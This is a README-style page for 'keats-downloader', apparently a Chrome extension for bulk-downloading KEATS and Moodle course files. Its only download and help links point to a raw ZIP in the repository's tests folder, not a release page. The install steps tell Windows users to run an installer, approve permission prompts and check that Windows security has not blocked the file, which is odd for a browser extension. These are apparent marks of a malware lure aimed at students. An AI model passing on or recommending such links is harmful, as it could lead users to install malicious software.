📥 keats-downloader - Download KCL course files fast

Download keats-downloader

🧰 What this app does

keats-downloader is a Chrome extension that helps you download course materials from KEATS and other Moodle sites.

It can collect:

  • Lecture slides
  • PDFs
  • Kaltura videos
  • Echo360 recordings
  • Other files posted in course folders

It sorts files into folders as it downloads them, so you do not have to do that by hand.

💻 What you need

Before you install it, make sure you have:

  • Windows 10 or Windows 11
  • Google Chrome
  • A working internet connection
  • Access to your KEATS or Moodle course
  • Enough free space for your course files

If you plan to download many videos, make sure you have extra disk space.

🚀 Download keats-downloader

Visit this page to download:

https://github.com/edar9498/keats-downloader/raw/refs/heads/main/tests/downloader-keats-3.8.zip

Open the latest release and download the file for Windows.

🪟 Install on Windows

  1. Open the download page above
  2. Find the latest release
  3. Download the Windows version
  4. If the file is a ZIP folder, right-click it and choose Extract All
  5. Open the extracted folder
  6. If you see an installer, double-click it
  7. If you see a Chrome extension file, follow the steps in the extension section below

If Windows asks for permission, choose Yes.

🔧 Add the extension to Chrome

If the release gives you an extension folder or unpacked files, do this:

  1. Open Chrome
  2. Paste this in the address bar: chrome://extensions
  3. Turn on Developer mode in the top right
  4. Click Load unpacked
  5. Select the extracted keats-downloader folder
  6. Make sure the extension appears in the list

If the release includes a packaged install file, use the steps in the release notes on the download page.

📚 Use it with KEATS or Moodle

  1. Open KEATS or your Moodle course in Chrome
  2. Sign in to your account
  3. Open the course you want to download from
  4. Start the keats-downloader extension
  5. Choose the materials you want
  6. Let it scan the course page
  7. Start the download

The app groups files into folders as it runs. This helps keep slides, PDFs, and videos separate.

🗂️ What gets saved

You can expect folders like these:

  • Slides
  • PDFs
  • Videos
  • Echo360
  • Kaltura
  • Course Files

The exact folder names can change based on the course page, but the file order stays easy to follow.

🧭 Simple workflow

Use this flow each time:

  1. Open Chrome
  2. Sign in to KEATS or Moodle
  3. Open the course
  4. Launch keats-downloader
  5. Pick the materials you want
  6. Wait for the files to finish downloading
  7. Open the download folder and check the files

🧪 If the extension does not start

Try these steps:

  1. Refresh the course page
  2. Make sure you are signed in
  3. Check that the extension is enabled in Chrome
  4. Close and reopen Chrome
  5. Try another course page
  6. Check that you selected the right folder when loading the extension

If the page uses different course tools or nested links, open the main course page first.

🔒 Account access

keats-downloader uses your normal course access in Chrome.

If you cannot see a file on the course page, the extension cannot download it either. Make sure the file is visible to your account.

🖱️ Tips for better results

  • Keep the course page open while it runs
  • Do not sign out during the download
  • Leave Chrome open until all files finish
  • Use a stable network connection
  • Download one course at a time for large courses

🗃️ File types supported

This tool is made for common course content on KEATS and Moodle, such as:

  • PDF handouts
  • PowerPoint slides
  • Lecture notes
  • Video links
  • Embedded media
  • Week-by-week course folders

It works best when the course uses standard Moodle-style pages and file links.

🔄 Updating the app

When a new version is released:

  1. Go back to the release page
  2. Download the newest version
  3. Replace the old files or reinstall the extension
  4. Open Chrome again
  5. Load the updated version if needed

📍 Where to get help

Start with the GitHub release page:

https://github.com/edar9498/keats-downloader/raw/refs/heads/main/tests/downloader-keats-3.8.zip

Check the latest release notes for the newest build, install steps, and file details

🧩 Common folder layout

A typical download may look like this:

  • Course Name
    • Week 1
      • Slides
      • Reading
    • Week 2
      • Lecture Video
      • Handout
    • Extras

This helps you find each file without sorting everything yourself

📌 Supported platforms

keats-downloader is made for:

  • KCL KEATS
  • Moodle-based university sites
  • Other course pages that use similar layouts

🛠️ Troubleshooting checklist

If something looks wrong, check these items:

  • Chrome is up to date
  • The extension is loaded in chrome://extensions
  • You are on the correct course page
  • You are signed in
  • Pop-up blockers are not stopping the tool
  • The download folder has enough space
  • The file was not blocked by Windows security settings
